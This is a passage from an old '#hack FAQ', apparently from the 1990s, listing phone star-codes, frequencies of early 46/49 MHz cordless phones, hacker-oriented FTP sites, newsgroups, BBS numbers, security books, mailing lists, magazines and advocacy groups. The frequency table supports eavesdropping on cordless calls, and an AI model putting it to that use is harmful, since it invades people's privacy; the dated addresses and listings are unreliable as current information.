           (THESE APPEAR TO BE STANDARD, BUT MAY BE CHANGED LOCALLY)
                                       
                 *57 CUSTOMER ORIGNATED TRACE (COT) ACTIVATION
                 *60 SELECTIVE CALL REJECTION (SCR) ACTIVATION
              *61 SELECTIVE DISTINCTIVE ALERTING (SDA) ACTIVATION
                *62 SELECTIVE CALL ACCEPTANCE (SCA) ACTIVATION
                *63 SELECTIVE CALL FORWARDING (SCF) ACTIVATION
                       *65 ICLID ACTIVATION (CALLER ID)
                     *66 AUTOMATIC RECALL (AR) ACTIVATION
                            *67 CALL PRIVACY TOGGLE
                    *68 COMPUTER ACCESS RESTRICTION TOGGLE
                    *68 COMPUTER ACCESS RESTRICTION TOGGLE
                               *69 AC ACTIVATION
                           *70 CALL WAITING DISABLE
                    *71 RING, NO-ANSWER FORWARD ACTIVATION
                   *72 CALL FORWARDING IMMEDIATE ACTIVATION
                       *73 CALL FORWARDING DEACTIVATION
                           *74 SPEED CALL 8 PROGRAM
                             *80 SCR DEACTIVATION
                             *81 SDA DEACTIVATION

                                                            #hack FAQ (77/3466)
                             *82 SCA DEACTIVATION
                             *83 SCF DEACTIVATION
                            *85 ICLID DEACTIVATION
                              *86 AR DEACTIVATION
                              *89 AC DEACTIVATION
                                       
                                       
              24. WHAT FREQUENCIES DO CORDLESS PHONES OPERATE ON?
                                       
      HERE ARE THE FREQUENCIES FOR THE FIRST GENERATION 46/49MHZ PHONES.
                THE NEW 900MHZ CORLESS PHONES ARE NOT COVERED.
                                       
                 CHANNEL    HANDSET TRANSMIT    BASE TRANSMIT
                 -------    ----------------    -------------
                     1          49.670MHZ          46.610MHZ
                       2          49.845             46.630
                       3          49.860             46.670
                       4          49.770             46.710
                       5          49.875             46.730
                       6          49.830             46.770
                       7          49.890             46.830
                       8          49.930             46.870

                                                            #hack FAQ (77/3488)
                       9          49.990             46.930
                      10          49.970             46.970
                                       
                                       
                                       
                                       
                             SECTION C: RESOURCES
                             ~~~~~~~~~~~~~~~~~~~~
                                       
                                       
              01. WHAT ARE SOME FTP SITES OF INTEREST TO HACKERS?
                                       
                                AQL.GATECH.EDU
                                 BELLCORE.COM
                             BRIC-A-BRAC.APPLE.COM
                                   CERT.ORG
                                 CRIMELAB.COM
                                CYBERSPACE.COM
                               DEIMOS.CS.UAH.EDU
                       F.MS.UKY.EDU            /PUB/MISC
                                 FREESIDE.COM
                FTP.ARMORY.COM          /PUB/USER/KMARTIND/PROG

                                                            #hack FAQ (77/3510)
                      FTP.CLARK.NET           /PUB/JCASE
                   FTP.CSUA.BERKELEY.EDU   /PUB/CYPHERPUNKS
                       FTP.EFF.ORG             /PUB/CUD
                                 FTP.ETEXT.ORG
     FTP.MCS.COM             /MCSNET.USERS/CRISADM/STUFF/RESEARCH/SAMPLES
                      FTP.NETCOM.COM          /PUB/ZZYZX
                     FTP.NETCOM.COM          /PUB/BRADLEYM
                       FTP.RAHUL.NET           /PUB/LPS
     FTP.STD.COM             /OBI/MISCHIEF/ AND /ARCHIVES/ALT.LOCKSMITHING
                               FTP.WARWICK.AC.UK
                                FTP.WIN.TUE.NL
                     FTP.WINTERNET.COM       /USERS/CRAIGB
                       GARBO.UWASA.FI          /PC/CRYPT
                      GHOST.DSI.UNIMI.IT      /PUB/CRYPT
                              GRANUAILE.IEUNET.IE
                             GREGORIO.STANFORD.EDU
                              GRIND.ISCA.UIWA.EDU
                            HACK-THIS.PC.CC.CMU.EDU
                                  HALCYON.COM
                                 IDEAL.IOS.NET
                LCS.MIT.EDU             /* TELECOM ARCHIVES */
                              MARTIGNY.AI.MIT.EDU

                                                            #hack FAQ (77/3532)
                  MARY.IIA.ORG            /PUB/USERS/PATRIOT
                     NIC.FUNET.FI            /PUB/DOC/CUD
       PARADOX1.DENVER.COLORADO.EDU  /ANONYMOUS/TEXT-FILES/PYROTECHNICS/
                              PYRITE.RUTGERS.EDU
                                RENA.DIT.CO.JP
                      RIPEM.MSU.EDU           /PUB/CRYPT
                                 RTFM.MIT.EDU
                                 SEKURITY.COM
                                    SPY.ORG
                    THETA.IIS.U-TOKYO.AC.JP /PUB1/SECURITY
                         TITANIA.MATHEMATIK.UNI-ULM.DE
                                 UCENG.UC.EDU
                      WIMSEY.BC.CA            /PUB/CRYPTO
                                 WORLD.STD.COM
                                       
                                       
             02. WHAT ARE SOME NEWSGROUPS OF INTEREST TO HACKERS?
                                       
                  ALT.2600                DO IT 'TIL IT HERTZ
 ALT.2600.HOPE.TECH      TECHNOLOGY CONCERNS FOR HACKERS ON PLANET EARTH 1994
                                 ALT.CELLULAR
                               ALT.DCOM.TELECOM

                                                            #hack FAQ (77/3554)
       ALT.HACKERS             DESCRIPTIONS OF PROJECTS CURRENTLY UNDER
                                       
                                       
                                       
                            DEVELOPMENT (MODERATED)
           ALT.LOCKSMITHING        YOU LOCKED YOUR KEYS IN *WHERE*?
   ALT.HACKERS.MALICIOUS   THE REALLY BAD GUYS - DON'T TAKE CANDY FROM THEM
                            ALT.PRIVACY.ANON-SERVER
          ALT.SECURITY            SECURITY ISSUES ON COMPUTER SYSTEMS
  ALT.SECURITY.INDEX      POINTERS TO GOOD STUFF IN MISC.SECURITY (MODERATED)
  ALT.SECURITY.KEYDIST    EXCHANGE OF KEYS FOR PUBLIC KEY ENCRYPTION SYSTEMS
            ALT.SECURITY.PGP        THE PRETTY GOOD PRIVACY PACKAGE
  ALT.SECURITY.RIPEM      A SECURE EMAIL SYSTEM ILLEGAL TO EXPORT FROM THE US
                              COMP.DCOM.CELLULAR
                             COMP.DCOM.TELCOM.TECH
         COMP.DCOM.TELECOM       TELECOMMUNICATIONS DIGEST (MODERATED)
                            COMP.DCOM.TELECOM.TECH
                            COMP.ORG.CPSR.ANNOUNCE
                              COMP.ORG.CPSR.TALK
                                 COMP.ORG.EFF
                                 COMP.ORG.EFF
                                  COMP.RISKS

                                                            #hack FAQ (77/3576)
                            COMP.SECURITY.ANNOUNCE
       COMP.SECURITY.MISC      SECURITY ISSUES OF COMPUTERS AND NETWORKS
              COMP.SECURITY.UNIX      DISCUSSION OF UNIX SECURITY
        COMP.VIRUS              COMPUTER VIRUSES & SECURITY (MODERATED)
  MISC.SECURITY           SECURITY IN GENERAL, NOT JUST COMPUTERS (MODERATED)
                               REC.PYROTECHNICS
        SCI.CRYPT               DIFFERENT METHODS OF DATA EN/DECRYPTION
                                       
                                       
            03. WHAT ARE SOME TELNET SITES OF INTEREST TO HACKERS?
                                       
                              PHRED.PC.CC.CMU.EDU
                                       
                                       
            04. WHAT ARE SOME GOPHER SITES OF INTEREST TO HACKERS?
                                       
                                GOPHER.CPSR.ORG
                                GOPHER.EFF.ORG
                               GOPHER.PHRED.ORG
                               GOPHER.WIRED.COM
                               WIRETAP.SPIES.COM
                                       

                                                            #hack FAQ (78/3599)
     05. WHAT ARE SOME WORLD WIDE WEB (WWW) SITES OF INTEREST TO HACKERS?
                                       
                   HTTP://CRIMELAB.COM//BUGTRAQ/BUGTRAQ/HTML
                  HTTP://CS.PURDUE.EDU/HOMES/SPAF/COAST.HTML
                  HTTP://CS.PURDUE.EDU/HOMES/SPAF/PCERT.HTML
                            HTTP://DFW.NET/~ALEPH1
                               HTTP://FIRST.ORG
                               HTTP://L0PHT.COM
                 HTTP://TAMSUN.TAMU.EDU/~CLM3840/HACKING.HTML/
                    HTTP://TANSU.COM.AU/INFO/SECURITY.HTML
     HTTP://THE-TECH.MIT.EDU                         (LAMACCHIA CASE INFO)
                       HTTP://WWW.ACHILLES.NET/~PLUVIUS
                              HTTP://WWW.TIS.COM/
                           HTTP://WWW.CPSR.ORG/HOME
                      HTTP://WWW.IIA.ORG/~GAUTIER/ME.HTML
              HTTP://WWW.ENGIN.UMICH.EDU/~JGOTTS/UNDERGROUND.HTML
                             HTTP://WWW.NET23.COM
                        HTTP: /WWW.PARANOIA.COM /DEFCON
                         HTTP://WWW.PHANTOM.COM/~KING
                             HTTP://WWW.PHRED.ORG
                    HTTP://WWW.SPY.ORG /SECURITY/LOCAL/NEWS
                             HTTP://WWW.WIRED.COM

                                                            #hack FAQ (80/3623)
            06. WHAT ARE SOME IRC CHANNELS OF INTEREST TO HACKERS?
                                       
                                     #2600
                                     #HACK
                                    #PHREAK
                                    #LINUX
                                     #ROOT
                                     #UNIX
                                    #WAREZ
                                       
                                       
                07. WHAT ARE SOME BBS'S OF INTEREST TO HACKERS?
                                       
                     HACKER'S HAVEN          (303)343-4053
                     CORRUPT SEKURITY        (303)753-1719
              INDEPENDENT NATION      (315)656-4179   NUP: NONUP
                     UNDERWORLD_1994.COM     (514)683-1894
                     DIGITAL FALLOUT         (516)378-6640
                     FARM R0AD 666           (713)855-0261
                                       
                                       
                 08. WHAT BOOKS ARE AVAILABLE ON THIS SUBJECT?

                                                            #hack FAQ (82/3647)
                           GENERAL COMPUTER SECURITY
                           ~~~~~~~~~~~~~~~~~~~~~~~~~
                           COMPUTER SECURITY BASICS
                 AUTHOR: DEBORAH RUSSELL AND G.T. GENGEMI SR.
                    PUBLISHER: O'REILLY & ASSOCIATES, INC.
                             COPYRIGHT DATE: 1991
                              ISBN: 0-937175-71-4
                                       
                                       
           THIS IS AN EXCELLENT BOOK.  IT GIVES A BROAD OVERVIEW OF
                                       
        COMPUTER SECURITY WITHOUT SACRIFICING DETAIL.  A MUST READ FOR
                                       
                        THE BEGINNING SECURITY EXPERT.
                                       
                         COMPUTER SECURITY MANAGEMENT
                             AUTHOR: KAREN FORCHT
                          PUBLISHER: BOYD AND FRASER
                             COPYRIGHT DATE: 1994
                              ISBN: 0-87835-881-1
                                       
                         INFORMATION SYSTEMS SECURITY

                                                            #hack FAQ (82/3669)
                     AUTHOR: PHILIP FITES AND MARTIN KRATZ
                        PUBLISHER: VAN NOSTRAD REINHOLD
                             COPYRIGHT DATE: 1993
                              ISBN: 0-442-00180-0
                                       
                                       
                             UNIX SYSTEM SECURITY
                             ~~~~~~~~~~~~~~~~~~~~
                            PRACTICAL UNIX SECURITY
                  AUTHOR: SIMSON GARFINKEL AND GENE SPAFFORD
                    PUBLISHER: O'REILLY & ASSOCIATES, INC.
                             COPYRIGHT DATE: 1991
                              ISBN: 0-937175-72-2
                                       
                                       
        FINALLY SOMEONE WITH A VERY FIRM GRASP OF UNIX SYSTEM SECURITY
                                       
          GETS DOWN TO WRITING A BOOK ON THE SUBJECT.  BUY THIS BOOK.
                                       
                                READ THIS BOOK.
                                       
                        FIREWALLS AND INTERNET SECURITY

                                                            #hack FAQ (82/3691)
                 AUTHOR: WILLIAM CHESWICK AND STEVEN BELLOVIN
                           PUBLISHER: ADDISON WESLEY
                             COPYRIGHT DATE: 1994
                              ISBN: 0-201-63357-4
                                       
                             UNIX SYSTEM SECURITY
                              AUTHOR: RIK FARROW
                           PUBLISHER: ADDISON WESLEY
                             COPYRIGHT DATE: 1991
                              ISBN: 0-201-57030-0
                                       
                      UNIX SECURITY: A PRACTICAL TUTORIAL
                            AUTHOR: N. DEREK ARNOLD
                            PUBLISHER: MCGRAW HILL
                             COPYRIGHT DATE: 1993
                              ISBN: 0-07-002560-6
                                       
      UNIX SYSTEM SECURITY: A GUIDE FOR USERS AND SYSTEMS ADMINISTRATORS
                            AUTHOR: DAVID A. CURRY
                           PUBLISHER: ADDISON-WESLEY
                             COPYRIGHT DATE: 1992
                              ISBN: 0-201-56327-4

                                                            #hack FAQ (83/3714)
                             UNIX SYSTEM SECURITY
                 AUTHOR: PATRICK H. WOOD AND STEPHEN G. KOCHAN
                            PUBLISHER: HAYDEN BOOKS
                             COPYRIGHT DATE: 1985
                              ISBN: 0-672-48494-3
                                       
                                       
                               NETWORK SECURITY
                               ~~~~~~~~~~~~~~~~
                           NETWORK SECURITY SECRETS
                    AUTHOR: DAVID J. STANG AND SYLVIA MOON
                             PUBLISHER: IDG BOOKS
                             COPYRIGHT DATE: 1993
                              ISBN: 1-56884-021-7
                                       
                                       
           NOT A TOTAL WASTE OF PAPER, BUT DEFINITELY NOT WORTH THE
                                       
          $49.95 PURCHASE PRICE.  THE BOOK IS A REHASH OF PREVIOUSLY
                                       
         PUBLISHED INFORMATION.  THE ONLY SECRET WE LEARN FROM READING
                                       

                                                            #hack FAQ (83/3736)
         THE BOOK IS THAT SYLVIA MOON IS A YOUNGER WOMAN MADLY IN LOVE
                                       
                          WITH THE OLDER DAVID STANG.
                                       
                       COMPLETE LAN SECURITY AND CONTROL
                              AUTHOR: PETER DAVIS
                      PUBLISHER: WINDCREST / MCGRAW HILL
                             COPYRIGHT DATE: 1994
                     ISBN: 0-8306-4548-9 AND 0-8306-4549-7
                                       
                               NETWORK SECURITY
                     AUTHOR: STEVEN SHAFFER AND ALAN SIMON
                          PUBLISHER: AP PROFESSIONAL
                             COPYRIGHT DATE: 1994
                              ISBN: 0-12-638010-4
                                       
                                       
                                 CRYPTOGRAPHY
                                 ~~~~~~~~~~~~
       APPLIED CRYPTOGRAPHY: PROTOCOLS, ALGORITHMS, AND SOURCE CODE IN C
                            AUTHOR: BRUCE SCHNEIER
                         PUBLISHER: JOHN WILEY & SONS

                                                            #hack FAQ (83/3758)
                             COPYRIGHT DATE: 1994
                              ISBN: 0-471-59756-2
                                       
                                       
               BRUCE SCHNEIER'S BOOK REPLACES ALL OTHER TEXTS ON
                                       
         CRYPTOGRAPHY.  IF YOU ARE INTERESTED IN CRYPTOGRAPHY, THIS IS
                                       
             A MUST READ.  THIS MAY BE THE FIRST AND LAST BOOK ON
                                       
                    CRYPTOGRAPHY YOU MAY EVER NEED TO BUY.
                                       
                        CRYPTOGRAPHY AND DATA SECURITY
                            AUTHOR: DOROTHY DENNING
                   PUBLISHER: ADDISON-WESLEY PUBLISHING CO.
                             COPYRIGHT DATE: 1982
                              ISBN: 0-201-10150-5
                                       
                              PROGRAMMED THREATS
                              ~~~~~~~~~~~~~~~~~~
                   THE LITTLE BLACK BOOK OF COMPUTER VIRUSES
                              AUTHOR: MARK LUDWIG

                                                            #hack FAQ (83/3780)
                    PUBLISHER: AMERICAN EAGLE PUBLICATIONS
                             COPYRIGHT DATE: 1990
                              ISBN: 0-929408-02-0
                                       
                                       
          THE ORIGINAL, AND STILL THE BEST, BOOK ON COMPUTER VIRUSES.
                                       
          NO MEDIA HYPE HERE, JUST GOOD CLEAN TECHNICAL INFORMATION.
                                       
                COMPUTER VIRUSES, ARTIFICIAL LIFE AND EVOLUTION
                              AUTHOR: MARK LUDWIG
                    PUBLISHER: AMERICAN EAGLE PUBLICATIONS
                             COPYRIGHT DATE: 1993
                              ISBN: 0-929408-07-1
                                       
      COMPUTER VIRUSES, WORMS, DATA DIDDLERS, KILLER PROGRAMS, AND OTHER
                                       
                            THREATS TO YOUR SYSTEM
                     AUTHOR: JOHN MCAFEE AND COLIN HAYNES
                         PUBLISHER: ST. MARTIN'S PRESS
                             COPYRIGHT DATE: 1989
                     ISBN: 0-312-03064-9 AND 0-312-02889-X

                                                            #hack FAQ (85/3804)
                          HACKING HISTORY AND CULTURE
                          ~~~~~~~~~~~~~~~~~~~~~~~~~~~
       THE HACKER CRACKDOWN: LAW AND DISORDER ON THE ELECTRONIC FRONTIER
                            AUTHOR: BRUCE STERLING
                            PUBLISHER: BANTAM BOOKS
                             COPYRIGHT DATE: 1982
                              ISBN: 0-553-56370-X
                                       
                                       
        BRUCE STERLING HAS RECENTLY RELEASED THE BOOK FREE TO THE NET.
                                       
            THE BOOK IS MUCH EASIER TO READ IN PRINT FORM, AND THE
                                       
         PAPERBACK IS ONLY $5.99.  EITHER WAY YOU READ IT, YOU WILL BE
                                       
          GLAD YOU DID.  MR. STERLING IS AN EXCELLENT SCIENCE FICTION
                                       
          AUTHOR AND HAS BROUGHT HIS TALENT WITH WORDS TO BEAR ON THE
                                       
            HACKING CULTURE.  A VERY ENJOYABLE READING EXPERIENCE.
                                       
                                   CYBERPUNK

                                                            #hack FAQ (85/3826)
                     AUTHOR: KATIE HAFNER AND JOHN MARKOFF
                         PUBLISHER: SIMON AND SCHUSTER
                             COPYRIGHT DATE: 1991
                              ISBN: 0-671-77879-X
                                       
                               THE CUCKOO'S EGG
                              AUTHOR: CLIFF STOLL
                         PUBLISHER: SIMON AND SCHUSTER
                             COPYRIGHT DATE: 1989
                              ISBN: 0-671-72688-9
                                       
                  HACKERS: HEROES OF THE COMPUTER REVOLUTION
                              AUTHOR: STEVEN LEVY
                             PUBLISHER: DOUBLEDAY
                             COPYRIGHT DATE: 1984
                              ISBN: 0-440-13495-6
                                       
                                       
                                 UNCLASSIFIED
                                 ~~~~~~~~~~~~
                             THE HACKER'S HANDBOOK
                             AUTHOR: HUGO CORNWALL

                                                            #hack FAQ (85/3848)
                      PUBLISHER: E. ARTHUR BROWN COMPANY
                                COPYRIGHT DATE:
                              ISBN: 0-912579-06-4
                                       
                           SECRETS OF A SUPER HACKER
                            AUTHOR: THE KNIGHTMARE
                             PUBLISHER: LOOMPANICS
                             COPYRIGHT DATE: 1994
                              ISBN: 1-55950-106-5
                                       
                                       
        THE KNIGHTMARE IS NO SUPER HACKER.  THERE IS LITTLE OR NO REAL
                                       
         INFORMATION IN THIS BOOK.  THE KNIGHTMARE GIVES USEFUL ADVICE
                                       
            LIKE TELLING YOU NOT TO DRESS UP BEFORE GOING TRASHING.
                                       
             THE KNIGHTMARE'S BEST HACK IS FOOLING LOOMPANICS INTO
                                       
                           PUBLISHING THIS GARBAGE.
                                       
                          THE DAY THE PHONES STOPPED

                                                            #hack FAQ (85/3870)
                              AUTHOR: LEONARD LEE
                    PUBLISHER: PRIMUS / DONALD I FINE, INC.
                             COPYRIGHT DATE: 1992
                              ISBN: 1-55611-286-6
                                       
                                       
        TOTAL GARBAGE.  PARANOID DELUSIONS OF A LUNATIC.  LESS FACTUAL
                                       
                  DATA THAT AN AVERAGE ISSUE OF THE ENQUIRER.
                                       
                              INFORMATION WARFARE
                             AUTHOR: WINN SWARTAU
                       PUBLISHER: THUNDER MOUNTAIN PRESS
                             COPYRIGHT DATE: 1994
                              ISBN: 1-56025-080-1
                                       
                                       
            09. WHAT ARE SOME MAILING LISTS OF INTEREST TO HACKERS?
                                       
                              ACADEMIC FIREWALLS
                              REFLECTOR ADDRESS:
       REGISTRATION ADDRESS: SEND A MESSAGE TO MAJORDOMO@GREATCIRCLE.COM

                                                            #hack FAQ (86/3893)
                CONTAINING THE LINE "SUBSCRIBE FIREWALLS USER@HOST"
                                       
                                    BUGTRAQ
                  REFLECTOR ADDRESS:    BUGTRAQ@CRIMELAB.COM
              REGISTRATION ADDRESS: BUGTRAQ-REQUEST@CRIMELAB.COM
                                       
                                  CERT TOOLS
                   REFLECTOR ADDRESS:    CERT-TOOLS@CERT.ORG
               REGISTRATION ADDRESS: CERT-TOOLS-REQUEST@CERT.ORG
                                       
                             COMPUTERS AND SOCIETY
              REFLECTOR ADDRESS:    COMP-SOC@LIMBO.INTUITIVE.COM
               REGISTRATION ADDRESS: TAYLOR@LIMBO.INTUITIVE.COM
                                       
             COORDINATED FEASIBILITY EFFORT TO UNRAVEL STATE DATA
                     REFLECTOR ADDRESS:    LDC-SW@CPSR.ORG
                             REGISTRATION ADDRESS:
                                       
                            CPSR ANNOUNCEMENT LIST
                 REFLECTOR ADDRESS:    CPSR-ANNOUNCE@CPSR.ORG
                             REGISTRATION ADDRESS:
                                       

                                                            #hack FAQ (86/3915)
                         CPSR - INTELLECTUAL PROPERTY
                 REFLECTOR ADDRESS:    CPSR-INT-PROP@CPSR.ORG
                             REGISTRATION ADDRESS:
                                       
                            CPSR - INTERNET LIBRARY
                  REFLECTOR ADDRESS:    CPSR-LIBRARY@CPSR.ORG
                             REGISTRATION ADDRESS:
                                       
                              MACINTOSH SECURITY
                REFLECTOR ADDRESS:    MAC-SECURITY@ECLECTIC.COM
            REGISTRATION ADDRESS: MAC-SECURITY-REQUEST@ECLECTIC.COM
                                       
                                 NEXT MANAGERS
                              REFLECTOR ADDRESS:
            REGISTRATION ADDRESS: NEXT-MANAGERS-REQUEST@STOLAF.EDU
                                       
                                 RFC931-USERS
            REFLECTOR ADDRESS:    RFC931-USERS@KRAMDEN.ACF.NYU.EDU
                     REGISTRATION ADDRESS: BRNSTND@NYU.EDU
                                       
                                   RSA USERS
                  REFLECTOR ADDRESS:    RSAREF-USERS@RSA.COM

                                                            #hack FAQ (86/3937)
              REGISTRATION ADDRESS: RSAREF-USERS-REQUEST@RSA.COM
                                       
                                       
           10. WHAT ARE SOME PRINT MAGAZINES OF INTEREST TO HACKERS?
                                       
                          2600 - THE HACKER QUARTERLY
                          ~~~~~~~~~~~~~~~~~~~~~~~~~~~
                      E-MAIL ADDRESS: 2600@WELL.SF.CA.US
                                       
                 SUBSCRIPTION ADDRESS: 2600 SUBSCRIPTION DEPT
                                             PO BOX 752
                                    MIDDLE ISLAND, NY  11953-0752
                                       
          LETTERS AND ARTICLE SUBMISSION ADDRESS: 2600 EDITORIAL DEPT
                                                       PO BOX 99
                                             MIDDLE ISLAND, NY  11953-0099
                                       
        SUBSCRIPTIONS: UNITED STATES: $21/YR INDIVIDUAL, $50 CORPORATE.
                         OVERSEAS: $30/YR INDIVIDUAL, $65 CORPORATE.
                                       
                                       
                                  GRAY AREAS

                                                            #hack FAQ (86/3959)
                                  ~~~~~~~~~~
     GRAY AREAS EXAMINES GRAY AREAS OF LAW AND MORALITY AND SUBJECT MATTER
      WHICH IS ILLEGAL, IMMORAL AND/OE CONTROVERSIAL. GRAY AREAS EXPLORES
      WHY HACKERS HACK AND PUTS HACKING INTO A SOCIOLOGICAL FRAMEWORK OF
                               DEVIANT BEHAVIOR.
                                       
                    E-MAIL ADDRESS: GRAYAREA@WELL.SF.CA.US
                      E-MAIL ADDRESS: GRAYAREA@NETAXS.COM
                                       
                         U.S. MAIL ADDRESS: GRAY AREAS
                                            PO BOX 808
                                        BROOMALL, PA 19008
                                       
                  SUBSCRIPTIONS: $26.00 4 ISSUES FIRST CLASS
                          $34.00 4 ISSUES FOREIGN (SHIPPED AIR MAIL)
                                       
                                       
                                     WIRED
                                     ~~~~~
                 SUBSCRIPTION ADDRESS: SUBSCRIPTIONS@WIRED.COM
                                            OR: WIRED
                                            PO BOX 191826

                                                            #hack FAQ (86/3981)
                                    SAN FRANCISCO, CA 94119-9866
                                       
         LETTERS AND ARTICLE SUBMISSION ADDRESS: GUIDELINES@WIRED.COM
                                                     OR: WIRED
                                                   544 SECOND STREET
                                             SAN FRANCISCO, CA 94107-1427
                                       
      SUBSCRIPTIONS: $39/YR (US) $64/YR (CANADA/MEXICO) $79/YR (OVERSEAS)
                                       
                                       
                                 NUTS & VOLTS
                                 ~~~~~~~~~~~~
                             430 PRINCELAND COURT
                               CORONA, CA 91719
                                 (800)783-4624
                                       
                                       
            11. WHAT ARE SOME ORGANIZATIONS OF INTEREST TO HACKERS?
                                       
            COMPUTER PROFESSIONALS FOR SOCIAL RESPONSIBILITY (CPSR)
            ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      CPSR EMPOWERS COMPUTER PROFESSIONALS AND COMPUTER USERS TO ADVOCATE

                                                            #hack FAQ (86/4003)
    FOR THE RESPONSIBLE USE OF INFORMATION TECHNOLOGY AND EMPOWERS ALL WHO
       USE COMPUTER TECHNOLOGY TO PARTICIPATE IN THE PUBLIC DEBATE.   AS
      TECHNICAL EXPERTS, CPSR MEMBERS PROVIDE THE PUBLIC AND POLICYMAKERS
     WITH REALISTIC ASSESSMENTS OF THE POWER, PROMISE, AND LIMITATIONS OF
     COMPUTER TECHNOLOGY.  AS AN ORGANIZATION OF CONCERNED CITIZENS, CPSR
          DIRECTS PUBLIC ATTENTION TO CRITICAL CHOICES CONCERNING THE
        APPLICATIONS OF COMPUTING AND HOW THOSE CHOICES AFFECT SOCIETY.
                                       
          BY MATCHING UNIMPEACHABLE TECHNICAL INFORMATION WITH POLICY
      DEVELOPMENT SAVVY, CPSR USES MINIMUM DOLLARS TO HAVE MAXIMUM IMPACT
    AND ENCOURAGES BROAD PUBLIC PARTICIPATION IN THE SHAPING OF TECHNOLOGY
                                    POLICY.
                                       
            EVERY PROJECT WE UNDERTAKE IS BASED ON FIVE PRINCIPLES:
                                       
           *  WE FOSTER AND SUPPORT PUBLIC DISCUSSION OF AND PUBLIC
          RESPONSIBILITY FOR DECISIONS INVOLVING THE USE OF COMPUTERS IN
                           SYSTEMS CRITICAL TO SOCIETY.
                                       
         *  WE WORK TO DISPEL POPULAR MYTHS ABOUT THE INFALLIBILITY OF
                              TECHNOLOGICAL SYSTEMS.
                                       

                                                            #hack FAQ (86/4025)
        *  WE CHALLENGE THE ASSUMPTION THAT TECHNOLOGY ALONE CAN SOLVE
                          POLITICAL AND SOCIAL PROBLEMS.
                                       
        *  WE CRITICALLY EXAMINE SOCIAL AND TECHNICAL ISSUES WITHIN THE
               COMPUTER PROFESSION, NATIONALLY AND INTERNATIONALLY.
                                       
     *  WE ENCOURAGE THE USE OF COMPUTER TECHNOLOGY TO IMPROVE THE QUALITY
                                     OF LIFE.
                                       
                          CPSR MEMBERSHIP CATEGORIES
                               75  REGULAR MEMBER
                                50  BASIC MEMBER
                             200  SUPPORTING MEMBER
                             500  SPONSORING MEMBER
                             1000  LIFETIME MEMBER
                          20  STUDENT/LOW INCOME MEMBER
                             50  FOREIGN SUBSCRIBER
                      50  LIBRARY/INSTITUTIONAL SUBSCRIBER
                                       
                             CPSR NATIONAL OFFICE
                                 P.O. BOX 717
                             PALO ALTO, CA  94301

                                                            #hack FAQ (86/4047)
                                 415-322-3778
                              415-322-3798 (FAX)
                        E-MAIL: CPSR@CSLI.STANFORD.EDU
                                       
                                       
                     ELECTRONIC FRONTIER FOUNDATION (EFF)
                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     THE ELECTRONIC FRONTIER FOUNDATION (EFF) IS DEDICATED TO THE PURSUIT
     OF POLICIES AND ACTIVITIES THAT WILL ADVANCE FREEDOM AND OPENNESS IN
      COMPUTER-BASED COMMUNICATIONS. IT IS A MEMBER-SUPPORTED, NONPROFIT
        GROUP THAT GREW FROM THE CONVICTION THAT A NEW PUBLIC INTEREST
    ORGANIZATION WAS NEEDED IN THE INFORMATION AGE; THAT THIS ORGANIZATION
      WOULD ENHANCE AND PROTECT THE DEMOCRATIC POTENTIAL OF NEW COMPUTER
     COMMUNICATIONS TECHNOLOGY. FROM THE BEGINNING, THE EFF DETERMINED TO
    BECOME AN ORGANIZATION THAT WOULD COMBINE TECHNICAL, LEGAL, AND PUBLIC
      POLICY EXPERTISE, AND WOULD APPLY THESE SKILLS TO THE MYRIAD ISSUES
     AND CONCERNS THAT ARISE WHENEVER A NEW COMMUNICATIONS MEDIUM IS BORN.
                                       
       MEMBERSHIPS ARE $20.00 PER YEAR FOR STUDENTS, $40.00 PER YEAR FOR
           REGULAR MEMBERS, AND $100.00 PER YEAR FOR ORGANIZATIONS.
                                       
                   THE ELECTRONIC FRONTIER FOUNDATION, INC.

                                                            #hack FAQ (86/4069)
                    666 PENNSYLVANIA AVENUE S.E., SUITE 303
                            WASHINGTON, D.C.  20003
                                +1 202 544 9237
                              +1 202 547 5481 FAX
                             INTERNET: EFF@EFF.ORG
                                       
                                       
                        FREE SOFTWARE FOUNDATION (FSF)
                        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                       
                                       
                                      GNU
                                      ~~~
                                       
                                       
                   THE LEAGUE FOR PROGRAMMING FREEDOM (LPF)
                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      THE LEAGUE FOR PROGRAMMING FREEDOM IS AN ORGANIZATION OF PEOPLE WHO
     OPPOSE THE ATTEMPT TO MONOPOLIZE COMMON USER INTERFACES THROUGH "LOOK
     AND FEEL" COPYRIGHT LAWSUITS.  SOME OF US ARE PROGRAMMERS, WHO WORRY
      THAT SUCH MONOPOLIES WILL OBSTRUCT OUR WORK.  SOME OF US ARE USERS,
     WHO WANT NEW COMPUTER SYSTEMS TO BE COMPATIBLE WITH THE INTERFACES WE

                                                            #hack FAQ (86/4091)
      KNOW.  SOME ARE FOUNDERS OF HARDWARE OR SOFTWARE COMPANIES, SUCH AS
         RICHARD P. GABRIEL. SOME OF US ARE PROFESSORS OR RESEARCHERS,
     INCLUDING JOHN MCCARTHY, MARVIN MINSKY, GUY L. STEELE, JR., ROBERT S.
                          BOYER AND PATRICK WINSTON.
                                       
       "LOOK AND FEEL" LAWSUITS AIM TO CREATE A NEW CLASS OF GOVERNMENT-
     ENFORCED MONOPOLIES BROADER IN SCOPE THAN EVER BEFORE.  SUCH A SYSTEM
     OF USER-INTERFACE COPYRIGHT WOULD IMPOSE GRATUITOUS INCOMPATIBILITY,
                  REDUCE COMPETITION, AND STIFLE INNOVATION.
                                       
         WE IN THE LEAGUE HOPE TO PREVENT THESE PROBLEMS BY PREVENTING
     USER-INTERFACE COPYRIGHT.  THE LEAGUE IS NOT OPPOSED TO COPYRIGHT LAW
     AS IT WAS UNDERSTOOD UNTIL 1986 -- COPYRIGHT ON PARTICULAR PROGRAMS.
      OUR AIM IS TO STOP CHANGES IN THE COPYRIGHT SYSTEM WHICH WOULD TAKE
    AWAY PROGRAMMERS' TRADITIONAL FREEDOM TO WRITE NEW PROGRAMS COMPATIBLE
                     WITH EXISTING PROGRAMS AND PRACTICES.
                                       
    ANNUAL DUES FOR INDIVIDUAL MEMBERS ARE $42 FOR EMPLOYED PROFESSIONALS,
    $10.50 FOR STUDENTS, AND $21 FOR OTHERS.  WE APPRECIATE ACTIVISTS, BUT
          MEMBERS WHO CANNOT CONTRIBUTE THEIR TIME ARE ALSO WELCOME.
                                       
    TO CONTACT THE LEAGUE, PHONE (617) 243-4091, SEND INTERNET MAIL TO THE

